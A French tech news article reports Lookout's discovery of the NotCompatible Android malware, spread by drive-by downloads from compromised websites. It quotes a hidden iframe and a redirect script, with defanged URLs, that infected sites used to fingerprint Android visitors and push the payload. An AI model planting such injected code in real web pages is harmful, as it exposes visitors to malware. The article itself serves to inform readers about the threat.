Sécurité : un nouveau malware Android se propage par le biais de sites mobiles

01 juin 2018 à 15h36
0
00C8000005141710-photo-notcompatible.jpg
L'éditeur en sécurité mobile Lookout a mis le doigt sur un nouveau moyen utilisé par les hackers pour propager des malwares sur des terminaux Android : ces derniers utilisent une méthode proche de celle existant déjà sur les ordinateurs, qui consiste à charger un logiciel malveillant lorsqu'un site Web spécifique est visité.

« Dans ce type d'attaque, si un utilisateur visite un site Web compromis à partir d'un appareil Android, son navigateur Web va automatiquement commencer à télécharger une application. Cette méthode est communément appelée 'drive-by download' » explique Lookout sur son blog, c'est à dire que le mobinaute n'est pas invité à controler le téléchargement. « Lorsque l'application suspecte est téléchargée, l'appareil affiche une notification qui invite l'utilisateur à cliquer sur la notification pour installer l'application téléchargée. » Cette dernière est présentée comme une mise à jour de sécurité pour le terminal : elle nécessite cependant que l'autorisation d'installer des « sources inconnues » ait été accordée au préalable par l'utilisateur.

Il existe donc des freins à la propagation du malware en question, nommé NotCompatible, dont l'installation sur un terminal mobile permet de modifier les paramètres proxy de ce dernier. Néanmoins, ce qui interpelle Lookout dans cette situation, c'est principalement la méthode employée par les pirates pour diffuser le malware : selon l'éditeur, il semble que ce soit « la première fois que des sites Web compromis sont utilisés pour distribuer des logiciels malveillants ciblant les terminaux Android. »

Les sites infectés intègrent plusieurs morceaux de code dans chacune de leurs pages : l'élément suivant se trouve en bas de chaque page, et permet de déterminer la nature du terminal qui visite le site :

<iframe

style = "visibility: hidden; display: none; display: none;"

? src = "hxxp :/ / gaoanalitics.info / id = {1234567890 - 0000-DEAD-BOEUF-133713371337} "> </ iframe>

S'il s'agit d'un terminal Android, le site redirige vers le téléchargement du malware.

<html> <head> </ head> <body> <script type="text/javascript"> window.top.location.href = "hxxp :/ / androidonlinefix.info/fix1.php"; </ script> < / body> </ html>

Lookout travaille encore à l'évaluation du nombre de sites infectés par cette méthode, ainsi que sur son origine. Il y a cependant fort à parier que cette démarche risque de se démocratiser.
Soyez toujours courtois dans vos commentaires.
Respectez le réglement de la communauté.
0
0

Actualités du moment

Gimp passe en version 2.8 sur Linux avec une interface unifiée en option
Ivy Bridge : les PC portables d'entrée de gamme attendront
Analytics : IBM se renforce avec le rachat de Tealeaf
Evernote lève 70 millions de dollars
TomTom Via 130 : un GPS milieu de gamme à reconnaissance vocale
Kaspersky détaille les nouveautés de sa future gamme 2013
Dell : les PC de bureaux adoptent Ivy Bridge
PagesJaunes atteint ses objectifs pour le premier trimestre
RIM : seul le Playbook sera mis à jour sur BlackBerry 10
Logitech Solar Keyboard Folio : le solaire au service de l'iPad
Haut de page